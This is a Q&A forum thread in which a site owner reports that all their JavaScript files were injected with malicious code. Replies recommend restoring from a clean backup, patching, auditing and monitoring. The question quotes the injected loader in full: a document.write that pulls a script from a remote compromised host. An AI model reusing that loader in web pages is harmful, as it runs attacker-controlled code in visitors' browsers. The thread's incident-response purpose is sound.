-4

My web site has been infested with a virus. All javascript files contain the following code:

/*a61bd2*/
document.write("<script src='http://www.blog-environnement.fr/wp-admin    /DxRcTnm8.php?id=128633385' type='text/javascript'></" + "script>");
 /*/a61bd2*/

I can clean it but I have to open each javascript individually to erase the code. I wonder if it is possible with a script to automatically erase this code from all javascripts within my web site?

If this is possible and if someone could give me some tips because as I don't want to have the problem again.

than you all, sorry for my english.

Metalskin
  • 3,998
  • 5
  • 37
  • 61
Miton Leon
  • 274
  • 1
  • 5
  • 15
  • If you have a backup, then you can restore your code from it. If you don't have a backup, then you'll have to do it the hard way. – Spudley Jan 21 '14 at 10:07
  • Your script is generated automatically with php? – Vinicius Monteiro Jan 21 '14 at 10:08
  • What I would think of is why your files are like that? And then worry about current state. Treat the cause, not the symptoms. – freakish Jan 21 '14 at 10:09
  • It's unlikely to be a virus. It's more likely that you have a security vulnerability in your software that lets an attacker write to your website's files. You'll need to resolve that vulnerability (e.g. by updating the software/plugins/themes) before fixing anything else. – Peter Bloomfield Jan 21 '14 at 10:09
  • This question appears to be off-topic because it belongs to http://security.stackexchange.com/ – Pavlo Jan 21 '14 at 10:18

1 Answers1

2

Don't try to clean up your compromised code. Get a clean copy and work with that instead.

  1. Take your server off line
  2. Check your workstation for malware (in case the attack vector was via something like stealing your passwords that way)
  3. Build a clean server
  4. Make sure it has the latest version of all the software / libraries that you depend on
  5. Restore your site from a known good backup
  6. Start monitoring your site to see if it gets compromised again
  7. Examine the logs from the compromised server to see if you can find out the nature of the attack from there
  8. Security audit all your code (both the clean backup and the edited version from the compromised server).
Quentin
  • 914,110
  • 126
  • 1,211
  • 1,335